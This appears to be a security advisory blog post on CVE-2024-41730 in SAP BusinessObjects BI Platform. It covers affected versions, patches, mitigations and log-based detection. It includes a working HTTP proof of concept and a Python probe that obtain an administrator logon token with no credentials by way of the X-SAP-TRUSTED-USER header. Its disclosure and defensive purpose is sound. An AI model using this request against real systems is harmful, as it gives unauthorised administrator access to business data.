[PoC] Critical Authentication Vulnerability in SAP BusinessObjects Business Intelligence Platform

On August 13, 2024, SAP released a crucial security update to address a severe authentication vulnerability identified in the SAP BusinessObjects Business Intelligence Platform. This post provides an overview of the vulnerability, its potential impacts, and recommended mitigation steps to ensure your systems remain secure.

Vulnerability Overview

The vulnerability, tracked as CVE-2024-41730 (SAP Security Note 3479478), has been assigned a critical CVSS v3.0 base score of 9.8. It affects the Single Sign-On (SSO) functionality of the Enterprise authentication module of the SAP BusinessObjects Business Intelligence Platform. The root cause is a missing authentication check: when SSO is enabled on Enterprise authentication, an unauthenticated attacker with network access to the platform's RESTful Web Services interface can call a REST endpoint and obtain a logon token for an account of their choosing without presenting any credentials. A token for a privileged account amounts to full system compromise: exposure of sensitive business intelligence data, manipulation of reports and data, and disruption of BI services.

Affected Versions

The vulnerability impacts the following versions of the SAP BusinessObjects Business Intelligence Platform:

ENTERPRISE 430
ENTERPRISE 440

Proof of Concept

A demonstration of how the vulnerability can be exploited is shown below. The request targets the trusted-authentication logon endpoint of the BI Platform RESTful Web Services (port 6405 is the default port of the Web Application Container Server that hosts them; SAP_BOBJ is a placeholder for the target host). The only thing that identifies the caller is the X-SAP-TRUSTED-USER header, which names the Enterprise account to log on as; no password, shared secret or other proof of identity is sent:

GET /biprws/logon/trusted HTTP/1.1
Host: SAP_BOBJ:6405
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Priority: u=0, i
X-SAP-TRUSTED-USER: administrator

On an unpatched system with SSO enabled on Enterprise authentication, the server answers with a logon token for the named user (the REST SDK returns it in the X-SAP-LogonToken response header and in the response body). Sending that token in the X-SAP-LogonToken request header on subsequent /biprws requests gives the attacker an authenticated Administrator session. A patched system, or one on which SSO is not enabled for Enterprise authentication, does not issue a token for this request.

Mitigation and Patch Information

SAP has released patches that add the missing authentication check, so that Single Sign-On on Enterprise authentication is secured by default once they are applied. The patches are available for the following versions:

SBOP BI PLATFORM SERVERS 4.3 – Patch Level SP004
SBOP BI PLATFORM SERVERS 4.3 – Patch Level SP005
SBOP BI PLATFORM SERVERS 2025 – Patch Level SP00

Organizations are strongly advised to apply these patches immediately to protect their systems from potential exploitation.

Recommendations

To safeguard your SAP BusinessObjects Business Intelligence environment, start by identifying every instance of the platform in your organization, including the port on which its RESTful Web Services (/biprws) are reachable. Prioritize deployment of the patches by the criticality of each affected system. Until a system is patched, the vulnerability can only be triggered where SSO is enabled on Enterprise authentication, so disable that setting where it is not needed and restrict network access to the REST interface to the SSO front end or reverse proxy that legitimately uses it. Then assess the BI environment for signs of compromise: because the X-SAP-TRUSTED-USER header is not written to web-server access logs, look for requests to /biprws/logon/trusted from sources other than your approved SSO components, and review CMS audit records for logons and token generation that do not match a user's normal activity. Tightening authentication mechanisms and access controls, and keeping that monitoring in place after patching, will further strengthen your defenses.
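As an added example (not code from the original post or from RedRays), the Python below does two things that follow from the proof of concept and the recommendations above: it builds the same credential-less trusted-logon request and classifies the server's answer (a 200 with an X-SAP-LogonToken header means a session was minted on the strength of the header alone), and it scans access-log lines for hits on /biprws/logon/trusted that did not come from an approved SSO source. The assumptions are: the X-SAP-LogonToken response header and the POST /biprws/logoff call are used as documented for the BI RESTful Web Services SDK; the access-log format is a Tomcat-style common log format, and the sample lines, the gateway address 10.0.0.5 and the probe account name are constructed for this example.

```python
"""Added example: probe a BI Platform host for the CVE-2024-41730 behaviour and
hunt access logs for trusted-logon requests from unexpected sources."""
import http.client
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set, Tuple

TRUSTED_LOGON_PATH = "/biprws/logon/trusted"  # REST SDK trusted-auth logon (as in the PoC)
LOGOFF_PATH = "/biprws/logoff"                 # REST SDK logoff, used to drop a minted session


def build_probe_request(host: str, port: int, user: str) -> bytes:
    """Raw HTTP/1.1 request equivalent to the PoC: no credentials, no shared secret,
    only the X-SAP-TRUSTED-USER header naming the account to impersonate."""
    lines = [
        f"GET {TRUSTED_LOGON_PATH} HTTP/1.1",
        f"Host: {host}:{port}",
        "Accept: application/json",
        f"X-SAP-TRUSTED-USER: {user}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


@dataclass
class Verdict:
    status: int
    vulnerable: bool
    token: Optional[str]


def classify_response(status: int, headers: Dict[str, str]) -> Verdict:
    """A 200 carrying X-SAP-LogonToken means the CMS issued a session for the
    header-supplied user without any authentication check. A 401/403, or a 200
    without a token, means the request was not honoured."""
    token = next((v for k, v in headers.items() if k.lower() == "x-sap-logontoken"), None)
    return Verdict(status=status, vulnerable=(status == 200 and token is not None), token=token)


def send_probe(host: str, port: int = 6405, user: str = "cve_probe",
               use_tls: bool = False, timeout: float = 10.0) -> Verdict:
    """Live check (not exercised offline). Use a dedicated low-privilege Enterprise
    account ("cve_probe" is an assumed name): on a vulnerable host this creates a
    real session, which is logged off again immediately."""
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=timeout)
    conn.request("GET", TRUSTED_LOGON_PATH,
                 headers={"Accept": "application/json", "X-SAP-TRUSTED-USER": user})
    resp = conn.getresponse()
    resp.read()
    verdict = classify_response(resp.status, dict(resp.getheaders()))
    conn.close()
    if verdict.token:
        cleanup = conn_cls(host, port, timeout=timeout)
        cleanup.request("POST", LOGOFF_PATH, headers={"X-SAP-LogonToken": verdict.token})
        cleanup.getresponse().read()
        cleanup.close()
    return verdict


# Tomcat-style common access-log line (assumed format). Request headers are not in
# the log, so detection keys on the request path and the source address instead.
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def find_suspicious_trusted_logons(lines: Iterable[str],
                                   allowed_sources: Set[str]) -> List[Tuple[str, str, int]]:
    """Return (source_ip, timestamp, status) for every request to the trusted-logon
    endpoint that did not come from an approved SSO front end or reverse proxy.
    A 200 from an unexpected source is a session somebody obtained without logging in;
    a 401 from one is still an attempt worth investigating."""
    hits = []
    for line in lines:
        m = ACCESS_LOG_RE.match(line)
        if not m or m["path"].split("?", 1)[0] != TRUSTED_LOGON_PATH:
            continue
        if m["ip"] in allowed_sources:
            continue
        hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits


# Constructed sample log lines (not real data); 10.0.0.5 plays the approved SSO gateway.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Aug/2024:09:12:01 +0000] "GET /biprws/logon/trusted HTTP/1.1" 200 412
10.0.0.5 - - [14/Aug/2024:09:12:09 +0000] "GET /biprws/v1/documents HTTP/1.1" 200 2310
203.0.113.77 - - [14/Aug/2024:11:40:33 +0000] "GET /biprws/logon/trusted HTTP/1.1" 200 412
203.0.113.77 - - [14/Aug/2024:11:40:35 +0000] "GET /biprws/v1/users HTTP/1.1" 200 9104
198.51.100.9 - - [15/Aug/2024:02:03:17 +0000] "GET /biprws/logon/trusted HTTP/1.1" 401 118
""".splitlines()

if __name__ == "__main__":
    print(build_probe_request("SAP_BOBJ", 6405, "administrator").decode())
    for ip, ts, status in find_suspicious_trusted_logons(SAMPLE_LOG, {"10.0.0.5"}):
        print(f"{ts} {ip} -> {TRUSTED_LOGON_PATH} status={status}")
```

Run the log scan against real access logs with the allowlist set to the addresses of the components that are supposed to perform trusted logons; anything else hitting that path is either misconfiguration or an attacker. Only point send_probe at systems you own, and never with a privileged account name: on an unpatched host the token it receives is a live session for that user.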

Conclusion

The identification of CVE-2024-41730 underscores the critical need for robust security practices within business intelligence platforms. Organizations utilizing the SAP BusinessObjects Business Intelligence Platform must treat this vulnerability with the highest priority and implement the recommended patches without delay to protect their essential business data and operations.

Original Post: https://redrays.io/blog/critical-sap-businessobjects-authentication-vulnerability-cve-2024-41730/